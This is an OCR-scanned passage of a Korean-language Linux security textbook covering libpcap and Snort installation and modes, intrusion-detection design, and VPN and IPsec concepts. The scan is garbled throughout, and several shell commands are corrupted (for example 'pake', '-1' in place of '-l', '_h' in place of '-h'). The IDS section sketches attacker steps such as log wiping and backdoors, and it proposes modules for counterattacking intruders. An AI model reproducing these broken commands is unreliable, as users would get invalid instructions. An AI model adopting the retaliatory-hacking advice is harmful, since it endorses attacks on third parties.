만일 설치되여있지 않다면 다음 싸이트에서 libpcap 서고를 내리적재받아 설치한다. 
ftp : // ftp . ee . lbl . gov / libpcap . tar . Z 

우선 압축을 해제 하고 tar archive 를 푼다. 

# uncompress libpcap . tar . Z 

# tar xvf libpcap . tar 

생성된 등록부 ( libpcap -0. 4) 로 이동하여 다음과 같이 설치 한다. 

# . / configure 

# pake 

/ ^ake install 


258 
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# make install-incl 
^ snort 설치 

먼저 최 신 판본의 snort 를 내 리적재받는다. 

snort 의 공식 홈페 지 ( http :// www . snort , org /) 에 는 최 신 판본의 snort 프로그람이 
제 공되 고있 으며 snort 관련 문서 들과 검 출규칙 들이 있다. 

먼저 내 리적재받은 압축파일 을 푼다. 

# tar xvzf snort -2. 3. tar . gz 

archive 를 풀면 snort - 2.3 이라는 등록부가 생성되는데 이 등록부로 이동한다. 
INSTALL 파일을 읽어보면 설치명령들이 설명되여있는데 다음과 같이 하면 특별한 
오유없이 설치가 될것이다. 

# . / configure 

# make 

# make install 

一 snort 의 기본동작방식 
cr 망도청방식 

snort 는 일 명 무차별 방식 으로 국부망상의 모든 파케 트를 수집하는 LINUX 의 표준정 
적 서 고인 libpcap 를 리용하여 망상에 서 흐르는 모든 파케 트를 실 시 간적 으로 도청할수 있 
는 기능을 제공하고있다. 

. /snort -v : TCP/IP 파케트의 머리부정보를 표준출력화면에 현시한다. 

. /snort -vd : TCP/IP 과케 트의 머 리 부정 보와 함께 자료부분도 표준출력 화면 에 현시 
한다. 

. /snort -vde : 자료련결층의 정 보까지 보다 상세 하게 표준출력 화면에 현시 한다. 
cr 파케트 기록방식 

수집한 파케 트정 보를 파일 로 보관하기 위하여 이 기 능을 리용한다. 

. /snort -dev -1 ./log : 수집 한 파케트정보를 현재 등록부의 기록파일로 보관한다. 
만일 일정한 호스트 혹은 부분망에서 오는 파케 트정 보만을 기록하기 위 해서는 다음과 
같이 설정하면 된 다. 

./snort - dev 一1 . /log _h 192.168.1.0/24 

이렇게 하면 지정된 IP 주소나 부분망에서 오는 파케트에 대해서만 기록을 남긴다. 

^침입검출방식 

snort 에 서 는 snort , conf 파일 을 리 용하여 공격 패 런을 가지 고있는 규칙 파일 을 포함하여 
해 당한 공격을 검출한다. 

./snort -dev ~1 . /log _h 192.168.1.0/24 _c snort , conf 
snort , conf 파일 에 는 snort 의 동작과 관련된 각종 설정 정 보들이 서 술되 여 있 
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사용자는 이 파일에서 다음과 같은 기능에 대해서 편집하여야 한다. 

첫째로; 망 변수를 설정하여야 한다. 규칙설정에서 리용되는 변수에 해당한 값을 설 
정하는 부분이 다. 

둘째로; 전처리기를 구성하여야 한다. 전처리기에서는 IP 재조립기능，각종 호스트 및 
포구훑기， DoS 공격，트로이 목마，뒤문설 치 등을 검 출하기 위하여 필요한 망의 구성 조건 
을 마련하기 위한 선결동작을 정의한다. 

셋째 로; 줄력 모둘을 구성 하여 야 한다. 검 줄결과를 표준줄력 화면에 현시 하거 나 파일 로 
서 보관하기 위한 형식을 설정하는 부분이 다. 

넷째 로; 규칙 모임 을 구성 하여 야 한다. 가장 중요한것 은 규칙 모임 을 구성 하는것 이 다. 

해 당한 공격 패 런의 자료기 지 를 형 성 하고있는 규칙 파일 을 include 로 포함하거 나 혹은 # 
로 주석 처 리하여 포함시키 지 않을수 있 다. 

2) 응용준위 IDS 

응용프로그람수준에 서 의 DoS 공격 은 체 계 망봉사를 제 공해 주는 프로그람들을 리 용하 
여 공격하는 방식을 의 미한다. 그러 므로 이 공격방법 들은 실로 매 우 다양하다. 여 기서 망 
봉사에는 거의 모든 봉사가 포함된다. 

이 준위 에 서 실제 로 대 단히 많은 공격 수법 들이 존재한다. 

일 반적 으로 해 커 들이 체 계 가 제 공해 주는 망봉사를 리 용하여 진행 하는 공격 수법 들을 보 
면 다음과 같다. 

첫째 로; 호스트에 침 입한다. 

처음에 침입할 때는 가장 많이 리용되는 웨브포구나 ftp 포구를 리용하여 주로 관리가 
약한 일반사용자계정으로 체계에 접속한다. 

둘째로; 다음 망프로그람이나 통신규약의 취 약성을 리용하여 관리자권한을 얻는다. 

여 기서 는 IP 주소속이 기 나 엿 듣기，혹은 sendmail , telnet , ftp 등의 취 약성 을 리 용할 
수도 있고 파일체계에 존재하는 오유프로그람을 리용하여 관리자권한을 얻을수도 있다. 환 
경변수리용，경쟁조건 (race condition ), 완충기폭주 등의 방법도 침입자들에게서 자주 리 
용되는 방법 이 다. 

셋째 로; 기 록감추기 를 통하여 침 입흔적 을 지 운다. 

utmp , wtmp , lastlog 등의 파일 에 누가 언제 가입 등록했는지 에 대 한 정 보가 기 록되 
므로 이것을 지운다. 

넷째로; 뒤 문 ( backdoor ) 을 설치 하여 다음번 침입을 쉽게 할수 있도륵 한다. 뒤 문을 통 
하면 다음에 는 복잡한 과정 없 이 쉽 게 관리 자권한을 얻 을수 있 기 때 문에 뒤 문설 치 는 침 입 자 
들이 자주 리용하는 방법 들중 하나이 다. 

교묘하게 설치된 뒤문은 좀처 럼 찾기 어 려우며 조작체 계 를 새 로 설 치하는것 이 차라리 
간편한'방법 일수 있다. 따라서 한번 침 입당한 체계는 그 보안성을 심각하게 의심해볼 필 
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요가 있다. 

일단 관리자권한을 획득하면 체계는 완전히 장악되게 된다. 때문에 매 봉사마다 철저 
한 악성코드의 검사처리를 진행하여야 한다. 

응용준위 IDS 를 실현하기 위 해서는 CRON 데몬과 같이 체계기록파일을 실시 간적 으로 
감시 하여 관리 자에 게 실시 간으로 통보해 주는 새 로운 기 록파일감시 데몬을 작성 해 야 한다. 

통보된 기록정보로부터 먼저 관리자권한획득과 같은 악성코드를 검출하는 모둘을 작 
성 한다. 

교묘하게 위장된 악성문자렬 (root 권한획득，체계기록파일 및 각종 특권준위함수호출 
등)을 효률적으로 검색할수 있는 알고리듬을 생성한다. 

다음 체계가 제공해주는 각종 기록파일로부터 체계 접속시간，사용자이름，원격가입 등 
륵시 호스트이 름 등과 같은 침 입 검 줄과 관련될수 있는 모든 정 보들을 장악한다. 

장악한 결과자료들을 분석 하고 이 에 기 초하여 불법침 입 상황에 대 한 해 당한 처 리 조작 
을 진행하여 야 한다. 

구체 적 으로 본다면 해 당 봉사를 재 기동하거 나 일정한 시 간 혹은 필요하다면 봉사를 완 
전히 거부하게 할수 있다. 

또한 정확한 공격자를 찾을수 있다면 그에 대한 즉시적인 역공격을 진행할수 있는 모 
둘을 개발하여 야 한다. 
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제4절. 가상사설망 

가상사설 망 (Virtual Private Network : VPN ) 은 WAN 의 비 용을 감소시 키 며 경 계 선보 
안을 강화하기 위하여 도입되 였 다. 

VPN 은 전용선을 설 치하지 않고 공공망의 봉사를 리용하여 망통신의 비 용을 줄이 면 
서 통신의 안전성 을 일정하게 보장할수 있는 효과적 인 망구조이다. 먼거 리 접속의 경우 공 
중망을 통한 련결 이 두 콤퓨터사이 에 전용선을 사용하는것 보다 비 용이 훨씬 적 으며 모뎀 
이나 ISDN 을 사용하는 통신방식보다도 비용이 적 다. 

또한 VPN 을 사용하면 같은 기관망을 공중망을 통하여 서로 련결할수 있는 가능성을 
제공한다. 

VPN 은 새 로운 사설망이 없 이 기 존의 공중망을 사용하고 관리 와 운영 은 인 터네 트봉 
사 제 공업 자가 담당하게 됨 으로써 적은 운영 비 용을 들여 넓은 범위의 망을 구성할수 있다. 


3.4.1. VPN 의 정의 

VPN (Virtual Private Network ) 이 란 물리 적 인 교환망 (실 례 로 인 터 네 트) 에 서 물리 적 
인 망의 구성 과 무관계하게 론리 적 으로 닫긴 사용자그룹을 구성하여 다양한 기 능의 봉사 
를 제공하는 망의 한 형태이다. VPN 에 소속된 사용자는 VPN 을 물리적인 사설망으로 인 
식 한다. 

3.4.2 VPN 기술의 등장배경 

정보기술의 급속한 발전으로 다매체환경，인터네트환경 이 폭발적으로 확대되면서 사 
용자의 정 보통신 량이 급격 히 증가하고있 다. VPN 은 PSDN 과 같은 통신망을 리용하여 사 
설망의 특성과 우점을 유지하면서 비용을 획기적으로 줄일수 있는 방안으로 제기된 기술 
이다. 또한 이리한 기술이 현실적으로 가능한것은 PSDN , ISDN , ATM 과 같은 통신구조 
가 강화되고있기때문이다. 

3.4.3 사설망과 공공망 (Public Network ) 의 특징 

사설망의 우점은 망을 직접적으로 통제함으로써 망의 운영에 유연성과 독립성을 제공 
한다는 점 이다. 또한 망 장비에 대해 독점적으로 사용함으로써 인증되지 않은 접근에 대 
해 높은 수준의 보안을 실현한다는데 있다. 그러나 사설망에 의존하는 기관들은 독자적인 
지역적，국가적，범국가적 망구조를 필요로 하며 이를 위해서는 막대한 비용의 초기투자 
가 필요하다는 문제점이 있다. 따라서 사설망을 도입하는데서 운영의 유연성과 보안성을 중 
요한 기준으로 삼는다. 

망을 활용한 통신의 경우 사설망과 비교하여 볼 때 많은 우점을 제공한다. 
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첫째로; 투자비용이 말단장비로 한정되며 교환장비，전송장비，회선설비 등에 대한 투 
자가 필요없게 된다. 

둘째로; 높은 수준의 리용성，믿음성을 제공하며 지역적한계를 극복할수 있고 인증된 
접근에 대한 보안기능을 제공한다. 

그러 나 대 부분의 기 관들은 공공망을 리 용하면서 도 사설망의 우점 인 운영 의 유연성 과 독 
립성을 바라고있 다. VPN 봉사는 공공망에서 이러한 요구를 제공하는 고객지향형 
( Customer - oriented ) 방법 을 제 공한다. 

3.4.4. VPN 기초 

가상사설망대화는 인터네트와 같은 공공망에서의 인증되고 암호화된 통신통로이다 . 전 
송되 는 자료를 보호하기 위하여 암호화와 인증이 리 용된다. VPN 은 독립 적 인 봉사인데 이 
것은 두개의 호스트 ( Web , FTP , SMTP 등)들사이에 교환되는 모든 정보들이 이 암호화 
된 통로를 통하여 전송된 다는것 을 의 미한다. 

그림 3-29 에서 VPN 구성 의 전형 적 인 실례 를 보여주었 다. 

그림 3-29 에서는 인터네트에 련결된 두개의 서로 다른 망들을 보여주었는데 이 두개 
의 망들은 정 보를 교환하려 고 하지만 교환하려는 정보가 비밀이므로 안전하게 교환하려 고 
한다. 이 정 보를 보호하기 위하여 두 싸이 트사이 에 VPN 이 설 치된다. 

VPN 을 설치하기 전에 두개의 망은 다음과 같은것을 하여야 한다. 

^ 매 싸이 트는 망경 계 에 VPN 가능한 장치 를 설 치 하여 야 한다. 이 것 은 경 로기 나 방 
화벽 또는 VPN 전용장치 일수도 있다. 

^ 매 싸이 트는 다른 싸이트가 리 용하는 IP 부분망주소를 알고있 어 야 한다. 

^ 두 싸이트들은 같은 인증방법을 가지며 필요하다면 수자식증명서를 교환하여 
야 한다. 

^ 두 싸이트들은 같은 암호화방법을 가지며 필요하다면 암호화열쇠를 교환하여 
야 한다. 

그림 3-29 에 서 VPN 통로의 매 끝에 있는 장치 들은 인 터네 트련결 에 쓰이 는 경 로기 들 
이다. 

만일 Cisco 경 로기 가 있 다면 Diffie-Hellman 의 인증과 40 bit DES 암호화를 제 공하는 IP 
Sec 를 지원할수 있다. 

망 A 의 경 로기 는 192.168. 2. 0부분망으로 나가는 모든 자료흐름이 DES 를 리 용하여 암 
호화되도록 구성되 여 야 한다. 이것을 원격 암호화령역 이 라고 한다. 망 A 의 경 로기는 또한 
망 묘의 경로기에서 받은 임의의 자료가 복호화되여야 한다는것을 알아야 한다. 마찬가지 
로 망 묘의 경로기는 부분망 192.168.1.0 으로 향하는 모든 자료흐름을 암호화하며 망 A 
의 경로기로부터 받은 임의의 응답을 복호화할수 있게 구성되여야 한다. 
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작업 기 


작업 기 

권 


봉사기 


경로기 



베. 0 


연써꽤표* 



인터네트의 모든 다른 호스트들에 전송된 자료는 명백히 평문으로 전송된다. 암호화 
되는것은 이 두 부분망들사이의 통신뿐이다. 

VPN 은 두개의 암호화령역들사이의 통신대화를 보호한다. 여 러개의 VPN 들을 설치할 
때 에는 여 러개의 암호화령역 을 정의하여 야 한다. 

어떤 VPN 구성에서 두 경로기들사이에 위치한 망분석기는 두 경로기의 대면부의 원 
천 및 목적 지 IP 주소를 리 용하는 모든 파케 트들을 현시 할수 있 다. 그러 나 자료를 전송한 호 
스트의 IP 주소를 볼수 없을뿐아니 라 목적 지호스트의 IP 주소도 볼수 없 다. 이 정 보는 원 
래 파케 트안에 들어 있는 실제 적 인 자료와 함께 암호화된다. 원래 의 파케 트가 암호화되 면 경 
로기 는 자기 의 IP 주소를 원천주소로 하고 원격경 로기 의 목적 지 IP 주소를 리 용하는 새 로운 
IP 파케트안에 이 암호문을 교갑화한다. 이것을 통로뚫기 ( tunneling ) 라고 한다. 이렇게 하 
면 모든 파케 트들이 이 두 경 로기 들의 IP 주소를 리용하므로 공격 자는 VPN 을 통과하는 자 
료흐름이 공격할 가치가 있는것인지 추측할수 없게 된다. 모든 VPN 방법들이 이 기능을 유 
지하는것은 아니지만 이 기능은 대단히 쓸모있는것이다. 

두 경 로기 사이에 가상적 인 통로가 있으므로 인터네 트의 사설주소공간을 리용하는것외 
에 추가적인 리득을 얻게 된다. 례를 들면 망 A 의 호스트는 망주소변환이 없이도 
192.168. 2.0 망우의 호스트에 자료를 전송할수 있 다. 그 리유는 경 로기 들이 이 자료가 통 
로를 닷라 전송될 때 이 머 리 부정보를 교갑화하기 때 문이 다. 망 묘의 경 로기 가 그 파케 트 
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를 받으면 교갑파케드를 줄고 원래의 파케드를 복호화하며 그 자료를 목적지호스드에 전 
송한다. 

VPN 은 또한 가동환경 ( platform ) 과 봉사에 독립 이 라는 우점 도 가지 고있 다. 안전한 통 
신을 진행하기 위하여서는 작업기는 암호를 지원하는 쏘프트웨어를 리용하지 않아도 된다. 
이것은 자료흐름이 두개의 경로기사이를 통과할 때 자동적으로 실행된다. 이것은 평문으 
로 전송되 는 SMTP 같은 봉사도 목적 지호스트가 원격암호화령 역안에 있 다면 안전한 방식 
으로 리용될수 있 다는것 을 의 미한다. 


3.4.5. VPN 의 분류 

VPN 은 그 분류기준에 따라 구조상의 분류，구성상의 분류，구현계층간의 분류로 나 
눌수 있다. 

1) 구조상의 분류 

첫째로，인트라네트기반의 VPN 구조이다. 이 구조는 그림 3-30 과 같이 기관내부의 각 
부서들과 인터네트를 사이에 두고 물리적으로 떨어진 같은 지사들과의 안전한 통신을 보 
장하기 위하여 설계 된 구조이 다. 이 구조에서 는 내부망의 안전이 보장된 두 인트라네 트사 
이에 통로가 제공되며 전달되는 정보는 공중망을 지나는 동안 외부의 위협으로부터 보호 
받게 된다. 이러한 VPN 은 인트라네트와 같은 봉사가 제공되여야 하므로 고속의 전송속 
도이외 에도 재정정 보나 고객정보와 같은 중요한 기 업의 정보가 전송되 기때 문에 강력한 암 
호화와 안전한 정보교환이 보장되여야 한다. 

인트라네 트기반의 구조에 서 는 멀 리 떨 어 져 있는 지 사를 전용선으로 직 접 련결 하지 않 
고 동일한 지 역의 인터네 트봉사제 공자를 통하여 접속함으로써 통신설비 및 유지 비 용을 감 
소시킬수 있 다. 단지 VPN 의 말단을 통해 서 만 정 보의 전달이 가능하다는것 이 통신의 유 
연성을 감소시 킬수 있다. 



그림 3-30. 인트라 L 1 I 트기반의 VPN 


그러나 이 구조는 설치비용의 절약뿐아니라 그물형태의 망구성을 가능하게 하며 전송 
도중에 경 로기 가 고장나거 나 과부하상태 에 서 동적 인 경 로조종수법 으로 경 로를 변경하는 유 
연성까지 도 제 공한다. \ 

둘째로，기관과 협력업체，고객，공급자사이의 안전한 통신을 위한 엑스트라^^ 


錢變邊 錢變變©繼鹽 


265 






Lirnix 당보안 


의 VPN 구조이다. 엑스트라네트구조에서는 외부의 협력업체와 공급자에게 기관내부에 있 
는 자료에 접근할수 있도륵 허 용하므로 통로뚫기 ( tunneling ) 수법은 정보의 안전한 전송이 
외 에도 전송되는 정 보를 통한 위 협 으로부터 내부망을 보호하여 야 한다.그림 3-31 은 엑스 
트라네 트기 반의 VPN 을 보여주었 다. 



그림 3-31. 엑스트라 L 1 I 트기반의 VPN 

엑스트라네트기 반의 VPN 은 멀리 에 있는 사용자가 VPN 기능을 가전 쏘프트웨 어를 실 
행 시 키 거 나 접 근허 가를 받은 협 력 업 체 에 게 VPN 기 능을 가전 망대 면 카드를 설 치 하여 사용 
하는 형태로 구성된다. 그림 3-31 에서 보는바와 같이 엑스트라네트기반의 VPN 에서 통로 
는 사용자의 련결점부터 시작하여 말단체계의 대면부나 본사 방화벽의 통로스위치에서 끝 
나게 된다. 따라서 VPN 을 리용하는 기관에서는 접속점에서 방화벽과 같은 보안도구를 사 
용하는 방법으로 사용자의 인증，기밀성과 자료의 완전성을 조종하는것이 일반적인 방법 
이다. 

셋째로 원격접속기반의 VPN 구조이다. 멀리에 있거나 이동하는 직원들이 자신이 속 
한 기 관의 망에 접 속하기 위 하여 필요한 구조이 다. 그림 3-32 는 원격 접 속기 반의 VPN 을 보 
여주었다. 



손님 



그림 3-32. 원격접속기반의 VPN 구조 
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이동사용자는 지역의 망봉사제공자에게 련결만 하고 VPN 봉사는 망봉사제공자가 제 
공하기 때 문에 통로뚫기 를 가능하게 하는 쏘프트웨어 를 구비할 필요가 없 다. 그러 나 직 원 
들은 VPN 에 속도가 제 한된 모뎀 으로 접 속하게 되 므로 봉사의 믿음성과 품질 이 중요하며 
보안을 위해서는 원격지나 이동사용자들에 대한 강력한 인증이 필요하다. 엑스트라네트와 
의 차이 점 은 엑 스트라네 트는 원격 사용자가 VPN 기 능을 가능하게 하는 쏘프트웨어 를 실 행 
시키지 만는 원격 접 속구조는 망봉사제 공자를 통하여 VPN 기능이 제 공된다. 

이밖에도 우에서 설명된 구조를 혼합하여 구성되는 형태를 생각할수 있다. 

2) 구성상의 분류 

VPN 기 능을 제 공하는 방법 으로는 기 본적 으로 쏘프트웨어 에 기 초한 방법 과 하드웨 어 
에 기초한 방법 이 있 다. 하드웨 어에 기 초한 방법은 VPN 구현 방식 인 경 우 강력한 물리적， 
론리적보안을 제공할수 있으며 보안기능의 제공을 위한 봉사의 속도를 높일수 있지만 이 
것은 비용이 많이 들며 일단 설치되면 확장이 쉽지 않은 결함이 있다. 

VPN 은 쏘프트웨어 에 기 초한 방식 이 나 하드웨 어 에 기 초한 방식 에 관계 없 이 보안기 능 
을 수행하는 장비 에 따라 다음과 같은 네 가지 로 구분할수 있 다. 

첫째로 VPN 을 구축하려고 하는 응용프로그람 봉사기에 자료의 암호화，복호화와 사 
용자 인증기능을 내 장하고 의뢰기 에서 이 봉사기 로 접속하여 내부망으로 접근할수 있도륵 
하는 응용프로그람방식 이다. 이 방식에서는 VPN 기능이 필요한 응용프로그람봉사기가 새 
롭게 필요할 때마다 봉사기 에 기능을 추가하여 야 하는 결함이 있다. 

둘째로 의뢰기와 내부망사이의 보안이 필요한 곳에 독립적으로 자료의 암호화，복호 
화와 사용자인증을 하는 별도의 암호화장치 를 설 치하여 VPN 기 능을 수행하도록 하는 독 
립 봉사 ( stand - alone ) 방식 이 다. 이 것 은 VPN 기 능을 수행 하는 전용장치 를 사용하기 때 문에 고 
속의 통신이 필요한 경우에 적합하며 VPN 을 쉽게 확장할수 있는 우점이 있다. 

셋째 로 전송경 로상에 있는 경 로기 와 접 근봉사기 사이에 VPN 의 기 능을 수행하도록 하 
는 경로조종방식이다. 이 방식에서 통로는 점대점방식으로 형성되며 경로기에 부가된 VPN 
은 통로의 종단에 위 치한 경로기의 성능에 의존하기때문에 어느 장치가 사용되는가에 따 
라 기능이 제한될수 있다. 또한 전송경로상의 경로기는 기관 내부에서 통제할수 없는 경 
우가 많기때문에 비밀정보의 로출을 막기 힘든 결함이 있다. 

3.4.6. VPN 제품의 선택 

리용할 VPN 제 품을 선택할 때 여 러 가지 문제 들을 고려하여 야 한다. 

^ 강한 인증 
^ 충분한 암호화 
^ 규격 에 맞는가? 

ᄄ 다른 망봉사들과의 통합 
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만일 어 떤 전용의 싸이 트를 련결 하기 위하여 하나의 VPN 을 설 치 한다면 여 러 가지 선 
택 안들이 제기될수 있다. 실례로 Novell 계렬의 방화벽제품인 BorderManager 는 VPN 련결 
을 지 원한다. 문제는 VPN 이 독점적 이 라는것 이 다. 이것은 Border Manager 방화벽 을 가 
진 VPN 을 만들려 면 VPN 통로의 다른 끝에 다른 BorderManagei ■방화벽 을 설 치 하여 야 한 
다는것을 의미 한다. 만일 특정의 원격망과 통신하려고 VPN 을 설치 한다면 그 망이 어떤 VPN 
묶음을 리용하는가를 알아야 한다. 그 다음에 야 자기 가 어 떤 제 품을 선택할것 인가를 결정 
할수 있다. 

1) 강한 인증 

인증이 없이는 VPN 통로의 다른 끝에 있는 체계가 누구인지 정확히 결정할수 없다. 

인터네트상에서 공개열쇠를 교환할 때 믿음성 있는 증명서권한을 리용하지 않는다면 전 
화나 확스와 같은 다른 방법 들을 통하여 열 쇠값들을 확인하여 야 한다. 

2) 충분한 암호화 

《충분하다》는것은〈〈강하다》는것을 의미하지 않는다. 암호화방법을 선택하기 전에 
어떤 준위의 보안이 요구되는가를 결정하여야 한다. 실례로 인터네트상에서 중요하지만 득 
비밀은 아닌 자료를 주고받을 때 에는 40~56 bit DES 암호면 충분하다. 재정자료나 그 밖 
의 중요한 자료를 보낼 때에는 3중 DES 와 같은 강한 암호를 써야 한다. 

옳은 암호화준위 를 선택하여 야 하는 리유는 성 능과 관련된다. 리 용하는 암호화알고리 
듬이 강할수록 암호화와 복호화과정에 많은 시간이 요구된다. 실례로 56 K 회선을 통하여 인 
터네 트에 련결된 두개 의 망이 3중 DES 를 리 용한다면 응용프로그람의 한계 시 간을 보장할 
수 있도륵 충분히 빨리 자료를 통과시킬수 없다. 

열쇠를 쓰기 전에 어떤 크기의 열쇠가 필요한가를 생각하여야 한다. 

리용하는 열쇠의 형태도 성능에 영향을 준다. DES 와 같은 비밀열쇠의 암호화는 빠 
르기때 에 VPN 들에서 많이 쓴다. 그러 나 RSA 와 같은 공개 및 비밀열쇠암호는 같은 크기 
의 열쇠를 쓰는 비밀열쇠암호알고리 듬보다 10〜100분의 1정도로 느리 다. 따라서 공개 및 
비밀열쇠암호화에서 열쇠 관리는 더 많은 처 리시간을 요구한다. 많은 VPN 제품들은 초기 
에 열쇠를 교환하기 위하여 공개 및 비밀열쇠알고리듬을 리용하며 그다음 통신에는 모두 비 
밀 열쇠암호를 리용한다. 

3) 규격에 맞는가. 

VPN 에 쓰이는 암호화방법을 선택 할 때 에는 알고리듬을 충분히 검사하여 큰 약점 이 없 
는가를 조사하여야 한다. 실례로 DES 에서 유일한 결함은 열쇠의 크기가 작은것이다. 이 
것은 리용되는 열쇠의 수를 증가시킬수 있는 3중 DES 를 리용하여 극복할수 있다. 

또한 VPN 제품이 다른 VPN 방법들과 호환되는가를 확인하여야 한다. 
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4) 망봉사들과의 통합 

최 신의 VPN 실 현은 방화벽사용자등록부 그리 고 감시 Web 와 같은 다른 봉사들과 통합 
할 능력 을 가전다. Check Point 의 VPN -1 은 전체 Check Point 관리묶음으로 완전히 통합 
되였으며 이로부터 보안통합뿐아니라 주소변환，대역분배 등도 실현할수 있게 해준다. VPN 
련결의 인증을 중심에서 관리하는 능력은 매 련결이 얼마의 대역너비를 가지고있는가를 조 
종하는것 과 마찬가지 로 강력한 특징 으로 된 다. 

물론 리상적 인 VPN 실 현은 서 로 다른 제 작자들의 제 품들도 통합할수 있 다. 지 금까지 
는 새 로운 제 품들이 LDAP 나 3중 DES 와 같은 공업 규격 들을 포함하고있 었지만 통합에 성 
공하지는 못하였 다. 

Microsoft 가 그러한 실례 의 하나이 다. 그들은 Windows 2000 안에 VPN 실현을 포함하 
고있다. 물론 그 우점은 암호화와 인증기술을 능동등록부와 통합한것이다. 일부 제작자들 
(Check Point 와 같은)은 자기 의 VPN 제 품들을 Microsoft VPN 과 혼합하여 하나의 중심 적 
으로 정 의된 VPN 방책 이 Microsoft 와 특정제 작자의 VPN 접 근점 에 동일하게 적 용되 도록 하 
고있 다. 또한 능동등록부가 LDAP - 적 응이 므로 제3자의 VPN 들은 능동등록부에 보관된 사 
용자구좌정보의 VPN 허가에 기초할수 있다. 

3.4.7. VPN 제품의종류 

VPN 제품의 종류에는 여 러가지가 있다. 이것들을 크게 3가지 류형으로 갈라볼수 있다. 
^ 방화벽형 VPN 
^ 경로기형 VPN 
ᄄ 전용의 쏘프트웨 어 나 하드웨 어 

어 느 종류를 선택하겠는가 하는것은 자기의 요구와 이 미 구입한 설비 에 의존한다. 

1) 방화벽형 VPN 

가장 널리 쓰이는 VPN 실현은 방화벽통합이 다. 사람들이 대체로 방화벽을 자기 망주 
변에 설 치하려 고 하기때 문에 이 장치 가 VPN 련결을 지 원하도록 하는것 은 자연스러 운 확 
장으로 된다. 이것은 관리의 중심점을 제공하며 기관의 방화벽보안방책과 통과시키려고 하 
는 자료흐름사이에 직접적인 접촉을 실현한다. 

유일한 결함은 성능문제 이 다. 

바쁜 인 터 네 트회 선을 가지 고있 다면 그리 고 강한 암호화를 가지 는 여 러 개 의 VPN 을 리 
용하려 고 한다면 이 리 한 봉사를 진행하려 고 할 때 체계 에 과부하를 주게 된다. 

이것은 대체 일반적 으로 제 기되는 문제는 아니지 만 성능과 규모를 고려하여 VPN 통 
로을 어 디서 끝마치겠는가를 결정하여 야 한다. 

Check Point -1 과 같은 일부 방화벽 들은 처 리 기부하를 감소시 키 기 위 하여 암호화기 판 
들을 지원한다. 암호화기판은 표준 PCI 확장홈에 맞으며 암호화와 복호화를 다 취<한다. 

그러나 이 기판들을 리용하려면 자기의 PCI 확장홈들이 망기판들에 의하여 
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지 않는가를 확인하여 야 한다. 

2) 경로기형 VPN 

또 한가지 선택은 인터네트경계선경로기이다. 

이것은 인터네트에 련결하기 위하여 설치하는 또 하나의 장치 이 다. VPN 을 자기의 경 
계선경로기에서 끝나게 하면 자료흐름이 방화벽에 도착하기전에 그것을 복호화할수 있 게 
된 다. 

처리기부하가 문제로 되므로 많은 경로기들은 전용집적회로 ( ASIC ) 를 리용한다. 이 것 
은 경 로기 에 특정의 과제를 담당한 처 리 기들을 배속시키므로 경 로기 에 과부하가 걸리지 않 
게 된다. 

경 로기형 VPN 실현의 유일한 약점은 보안문제이 다. 

일반적으로 경로기들은 방화벽 에 비하여 매우 약한 경계선보안을 제공한다. 공격자가 
VPN 통로의 다른쪽에서 오는것 처 럼 보이 는 거 짓자료를 경 로기 로 통과시 킬수 있 다. 이 것 
은 공격 자가 인터네트의 다른 위 치 에서는 보이지 않게 봉사에 접 근할수 있다는것을 의 미 
한다. 

3) 전용하드웨어 또는 쏘프트웨어 

만일 이 미 방화벽 과 경 로기 를 구입하였지 만 VPN 능력 을 지 원하지 않는다하여 도 모방 
법 은 있 다. VPN 련결 을 만들기 위한 전용의 하드웨 어 나 쏘프트웨어 를 여 전히 쓸수 있 다. 
실례로 DEC 의 AltaVistaTunnel 은 원격망과 원격사용자 VPN 에로의 통로를 지원하는 우 
수한 제품이 다. 이것은 독립적 인 제품이 기때문에 임의의 현존방화벽 에서도 동작할수 있다. 

전용실 현의 가장 큰 약점 은 추가적 인 보안관리점 들이 생 기 는것 이 다. 만일 장치 가 방 
화벽바깥에 놓여있 다면 경 로기 에 서 와 같은 속임 수문제 들을 가지 게 된 다. 장치 를 방화벽 안 
에 넣 으면 자기 의 방화벽보안방책 을 리용하는 접 근을 관리할수 없게 된 다. 대 부분의 VPN 
실현은 원래의 과케트를 그대로 암호화한다. 이것은 자료흐름조종결정을 하는데 IP 머리 
부정보가 더 는 쓸모가 없 다는것 을 의 미한다. 통로의 한끝에 서 다른 끝으로 지 나가는 모든 
자료흐름은 같은 교갑파케 트머 리 부를 리용한다. 

이것은 방화벽이 그 통로에서 교갑화된 SMTP 와 telnet 대화사이를 구분할수 없다는 
것 을 의 미한다. 통로의 끝으로 통과시키 려는 자료흐름의 형 태를 조정 하기 위한 도구를 제 
공하려 면 전용 VPN 장치 에 의 거하여 야 한다. 

3.4.8. IPsec 실현 

VPN 을 실현할 때 방화벽의 망층에서 기본적으로 제공되 여 야 하는 보안봉사들에는 여 
러가지 가 있으나 그중 최 소한 다음과 같은 봉사는 필수적 으로 보장되 여 야 한다. 

^ 인증 ( Authentication ) : 수신자 혹은 중간전달자즉에서 자료의 머 리 부에 표시 된 송 
제 송신자인지 확인하는 봉사 
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^ 기밀성 ( Confidentiality ) : 통신도중에 상대 방이 아닌 다른 사람이 통신하는 자료의 
내용을 해독할수 없도록 보장하는 봉사 

@ 완전성: 통신도중에 송신자가 전송한 통보가 변경되지 않았음을 보장하는 봉사망 
층에서 VPN 을 실현하기 위해서는 SA(Security Association ) 를 기초로 하는 통신규약으 
로서 완전성 과 인증을 보장하는 AH (Authentication Header ) 와 암호화된 교갑화를 통하 
여 기밀성을 보장할수 있는 ESP (Encapsulation Security Payload ) 를 사용한다. AH 는 파 
케트내 자료를 검증가능한 서명과 결합시켜 자료송신자의 신원을 확인하고 자료가 변하지 
않았음을 검 증할수 있도륵 하며 ESP 는 매 파케 트의 자료를 망상에 서 침 입 자가 불법 적으 
로 해독할수 없도록 한다. 

또한 키관리 기구로 다양한 방법 이 사용될수 있는데 여 기서는 ISAKMP 와 기 타 몇 가 
지 기구에 대해서 설명 한다. 이러한 키 관리기구는 강력하고 유연한 협상 동신규약을 포함 
하여 사용자에게 인증방법，암호화방법，사용할 열쇠，그 열쇠의 유효기간 등에 대해 서 
로 합의 과정 을 거 쳐 안전하고 손쉬 운 열 쇠교환방식 을 제 공하여 야 한다. 

1 ) 인 증머 리 부 (Authentication Header : AH ) 

AH 는 IP 데 이 터그램 을 인증하기 위해 필요한 정 보를 포함하는 방법 으로 보안효과 특 
히 인증과 완전성을 보장해주는 기구로서 AH 정보는 송신자가 인증된 IP 파케트를 송신하 
기 직전에 구성 한다. 다음은 AH 를 사용하여 제 공될수 있는 기 본적 인 보안봉사에 대 해서 
서술하였다. 

